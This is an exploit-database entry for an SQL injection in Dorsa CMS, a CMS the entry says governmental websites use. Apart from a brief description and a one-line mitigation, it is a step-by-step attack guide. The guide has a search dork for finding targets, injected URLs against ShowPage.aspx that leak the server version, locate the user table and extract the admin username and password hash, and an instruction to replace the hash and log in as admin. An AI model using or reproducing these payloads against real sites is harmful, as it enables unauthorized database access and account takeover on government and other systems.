Dorsa CMS Exploit

vendor:

Dorsa CMS

by:

syst3m_f4ult && Y!ID : autumn_love6

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Dorsa CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

A SQL injection vulnerability was discovered in Dorsa CMS, a CMS written by Iranian programmers which is used by governmental websites. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This will allow the attacker to gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use parameterized queries.

Source

Exploit-DB raw data:

#########################################################
---------------------------------------------------------

Portal Name: Dorsa CMS
Vendor : http://www.dorsacms.com
Description : A CMS written by iranian programmers which uses by governmental websites.
Vulnerable File : ShowPage.aspx
Dork: Powered by DorsaCms
Author : syst3m_f4ult  && Y!ID : autumn_love6

---------------------------------------------------------
#########################################################

How to exploit :

a live example :

http://www.xxx.ir/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2

Testing injection :
http://www.xxx.ir/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,@@version)--
	Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise ...

Getting table which contains Username and Password:
Easiest way is to search it:

http://www.xxx.ir/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 table_name from information_schema.columns where column_name like %27%pass%%27))--

	table_name = Seller
Its not that table we are seeking, so we keep on:
http://www.xxx.ir/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 table_name from information_schema.columns where column_name like %27%pass%%27 and table_name not in ('Seller')))--

Bingo
	Table_name = USER_

Start to get username and pass from USER_:

http://www.xxx.ir/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 %2b'Username= '%2bconvert(varchar,isnull(convert(varchar,user_name),'NULL'))%2b' -- Password= : '%2bconvert(varchar,isnull(convert(varchar,Pass),'NULL')) from USER_ where Code='1'))

	user : admin
	pass : kaBY/8jRC+XbjSIIDhsHFmOX1B2pDd

Update hash to a hash you know its decode and enjoy.

login to portal :
http://www.xxx.ir/Dorsapax/Signin.aspx


---------------------------------------------------------
#########################################################

# milw0rm.com [2008-10-22]